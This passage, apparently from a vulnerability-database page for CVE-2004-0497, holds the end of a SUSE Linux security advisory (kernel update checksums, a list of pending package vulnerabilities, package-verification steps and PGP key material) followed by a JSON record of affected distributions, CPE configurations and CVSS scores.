ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-smp-2.6.5-7.95.nosrc.rpm
  a0096d1fc067d89c9200ea3904713d59
ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-source-2.6.5-7.95.src.rpm
  bf6d0439cfc37b50b4f6822c3403a74f

SUSE Linux 9.0:
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/k_deflt-2.4.21-231.x86_64.rpm
  17e008a737e5e95e71335e34fa7f86cf
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/k_smp-2.4.21-231.x86_64.rpm
  ca742b550b1a503595b02cbfc9e0e481
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/kernel-source-2.4.21-231.x86_64.rpm
  8e0c16c42d1a89aa6a09be1dd575de47
source rpm(s):
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/k_deflt-2.4.21-231.src.rpm
  58b1bf42b5661119d06a04888144707a
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/k_smp-2.4.21-231.src.rpm
  5103001136e39fca5a59f4cbde82822b
ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/kernel-source-2.4.21-231.src.rpm
  231c9e5e00f17df8cfd72d6c8a68d9cf

2) Pending vulnerabilities in SUSE Distributions and Workarounds:

- icecast
The icecast service is vulnerable to a remote denial-of-service
attack. Update packages will be available soon.

- sitecopy
The sitecopy package includes a vulnerable version of the
neon library (CAN-2004-0179, CAN-2004-0398). Update packages will be
available soon.

- cadaver
The cadaver package includes a vulnerable version of the
neon library (CAN-2004-0179, CAN-2004-0398). Update packages will be
available soon.

- OpenOffice_org
The OpenOffice_org package includes a vulnerable version
of the neon library (CAN-2004-0179, CAN-2004-0398). Update packages
will be available soon.

- tripwire
A format string bug in tripwire can be exploited locally
to gain root permissions. 
New packages are available.

- postgresql
A buffer overflow in psqlODBC could be exploited to crash the
application using it. E.g. a PHP script that uses ODBC to access a
PostgreSQL database can be utilized to crash the surrounding Apache
web-server. Other parts of PostgreSQL are not affected. 
New packages are available.

- XDM/XFree86
This update resolves random listening to ports by XDM
that allows to connect via the XDMCP. SUSE LINUX 9.1
is affected only. 
New packages are available.

- mod_proxy
A buffer overflow can be triggered by malicious remote
servers that return a negative Content-Length value. 
This vulnerability can be used to execute commands remotely
New packages are available.

- freeswan
A bug in the certificate chain authentication code could allow an
attacker to authenticate any host against a FreeS/WAN server by
presenting specially crafted certificates wrapped in a PKCS#7 file. 
The packages are currently being tested and will be available soon.

- ipsec-tools
The racoon daemon which is responsible for handling IKE messages
fails to reject invalid or self-signed X.509 certificates which
allows for man-in-the-middle attacks on IPsec tunnels established
via racoon. 
The packages are currently being tested and will be available soon.

- less
This update fixes a possible symlink attack in lessopen.sh. The
attack can be executed by local users to overwrite arbitrary files
with the privileges of the user running less. 
New packages are available.

- libpng
This update adds a missing fix for CAN-2002-1363. 
New packages are available.

- pavuk
This update fixes a remotely exploitable buffer overflow in pavuk. 
Thanks to Ulf Harnhammar for reporting this to us. 
New packages are available.

- kdebase3
This update fixes a possible attack on tmp files created at the
first login of a user using KDE or at the first time running a
KDE application. This bug can be exploited locally to overwrite
arbitrary files with the privilege of the victim user. 
Just affects SUSE LINUX 9.1
New packages are available.

3) standard appendix: authenticity verification, additional information

  • Package authenticity verification:

    SUSE update packages are available on many mirror ftp servers around the world. While this service is considered valuable and important to the free and open source software community, many users wish to be certain as to be the origin of the package and its content before installing the package. There are two independent verification methods that can be used to prove the authenticity of a downloaded file or rpm package: 1) md5sums as provided in the (cryptographically signed) announcement. 2) using the internal gpg signatures of the rpm package.

    1) execute the command md5sum after you have downloaded the file from a SUSE ftp server or its mirrors. Then, compare the resulting md5sum with the one that is listed in the announcement. Since the announcement containing the checksums is cryptographically signed (usually using the key security@suse.de), the checksums offer proof of the authenticity of the package. We recommend against subscribing to security lists which cause the email message containing the announcement to be modified so that the signature does not match after transport through the mailing list software. Downsides: You must be able to verify the authenticity of the announcement in the first place. If RPM packages are being rebuilt and a new version of a package is published on the ftp server, all md5 sums for the files are useless.

    2) rpm package signatures provide an easy way to verify the authenticity of an rpm package. Use the command rpm -v --checksig to verify the signature of the package, where is the filename of the rpm package that you have downloaded. Of course, package authenticity verification can only target an un-installed rpm package file. Prerequisites: a) gpg is installed b) The package is signed using a certain key. The public part of this key must be installed by the gpg program in the directory ~/.gnupg/ under the user's home directory who performs the signature verification (usually root). You can import the key that is used by SUSE in rpm packages for SUSE Linux by saving this announcement to a file ("announcement.txt") and running the command (do "su -" to be root): gpg --batch; gpg < announcement.txt | gpg --import SUSE Linux distributions version 7.1 and thereafter install the key "build@suse.de" upon installation or upgrade, provided that the package gpg is installed. The file containing the public key is placed at the top-level directory of the first CD (pubring.gpg) and at ftp://ftp.suse.com/pub/suse/pubring.gpg-build.suse.de .

  • SUSE runs two security mailing lists to which any interested party may subscribe:

    suse-security@suse.com - general/linux/SUSE security discussion. All SUSE security announcements are sent to this list. To subscribe, send an email to suse-security-subscribe@suse.com.

    suse-security-announce@suse.com - SUSE's announce-only mailing list. Only SUSE's security announcements are sent to this list. To subscribe, send an email to suse-security-announce-subscribe@suse.com.

    For general information or the frequently asked questions (faq) send mail to: suse-security-info@suse.com or suse-security-faq@suse.com respectively.

    ===================================================================== SUSE's security contact is security@suse.com or security@suse.de. The security@suse.de public key is listed below. =====================================================================


    The information in this advisory may be distributed or reproduced, provided that the advisory is not modified in any way. In particular, it is desired that the clear-text signature must show proof of the authenticity of the text. SUSE Linux AG makes no warranties of any kind whatsoever with respect to the information contained in this security advisory.

Type Bits/KeyID Date User ID pub 2048R/3D25D3D9 1999-03-06 SuSE Security Team security@suse.de pub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key build@suse.de

-----BEGIN PGP PUBLIC KEY BLOCK-----

Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org

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 DgCfZ5Wj+f7cnYpFZI6GkAyyczG09sE= =LRKC - -----END PGP PUBLIC KEY BLOCK-----


  • - | Roman Drahtm\xfcller draht@suse.de // "You don't need eyes to see, | SUSE Linux AG - Security Phone: // you need vision!" | N\xfcrnberg, Germany +49-911-740530 // Maxi Jazz, Faithless |
  • - -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (GNU/Linux)

iQEVAwUBQOWPL3ey5gA9JdPZAQFFzQf+Mo5WmO40BDHakn4qD5rAcfU6H/0rhMpy Bi8r+g6GoSp/m2Zy+1O0Qn3jVb/iirVlnHH3DND1r/GunM3c5CTaMYt2Bt7PTOdt OsjD41lbiFlHDmmmaodROQvcrz7T67YU0gCtSKJdDfs2ATiiUOcyUQZNfi/PiEqD jwmKpP5c1NXSXPSwZ2f430itJA5iUqqVBeB1WHn63kOnIKtHBJ9c6uw3rZ99t1OA iud3L+VQSycb8xQSlOsuiaYW1S236VsogKWRbqY76eo7E2AnVQlMpcZkyW91/vfT WntQlZJAaGFX1q/IyGy+PGFPUoJjNc7H6jy5ZqJqXR5Sb0KrHfadCQ== =24bz -----END PGP SIGNATURE-----

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200412-0085",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "secure linux",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "trustix",
        "version": "2.1"
      },
      {
        "model": "secure linux",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "trustix",
        "version": "2.0"
      },
      {
        "model": "secure linux",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "trustix",
        "version": "2"
      },
      {
        "model": "mandrake linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "9.2"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "gentoo",
        "version": "*"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "3.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "9.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "9.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "8.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "8.0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "mandrake linux corporate server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "2.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "8.2"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "conectiva",
        "version": "10"
      },
      {
        "model": "mandrake linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "10.0"
      },
      {
        "model": "mandrake multi network firewall",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "8.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0"
      },
      {
        "model": "mandrake linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "mandrakesoft",
        "version": "9.1"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "2.0"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "2.1"
      },
      {
        "model": "asianux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cybertrust",
        "version": "3.0"
      },
      {
        "model": "turbolinux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "turbo linux",
        "version": "7"
      },
      {
        "model": "turbolinux server",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "turbo linux",
        "version": "8"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "2.1 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "2.1 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "2.1 (ws)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (as)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (es)"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "3 (ws)"
      },
      {
        "model": "secure enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "trustix",
        "version": "2.0"
      },
      {
        "model": "linux personal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "9.1"
      },
      {
        "model": "fedora core2",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "fedora core1",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "enterprise linux ws",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "3"
      },
      {
        "model": "enterprise linux es",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "3"
      },
      {
        "model": "enterprise linux as",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "3"
      },
      {
        "model": "advanced workstation for the itanium processor ia64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.20"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "gentoo",
        "version": "1.4"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "10662"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000261"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0497"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200412-013"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:mandrakesoft:mandrake_multi_network_firewall:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:conectiva:linux:10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:2.1:*:advanced_server:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:2.1:*:enterprise_server:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:8.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:10.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:9.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:3.0:*:enterprise_server:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:3.0:*:workstation_server:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:trustix:secure_linux:2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:trustix:secure_linux:2.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:9.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux_corporate_server:2.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:8.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:8.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:gentoo:linux:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:2.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:2.1:*:workstation:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:redhat:enterprise_linux:3.0:*:advanced_server:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:suse:suse_linux:9.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:trustix:secure_linux:2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2004-0497"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Michael Schroeder\nRuediger Oertel",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200412-013"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2004-0497",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 2.1,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 2.1,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2004-0497",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Low",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 2.1,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "VHN-8927",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "LOW",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:N/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2004-0497",
            "trust": 1.8,
            "value": "LOW"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200412-013",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "VULHUB",
            "id": "VHN-8927",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8927"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000261"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0497"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200412-013"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
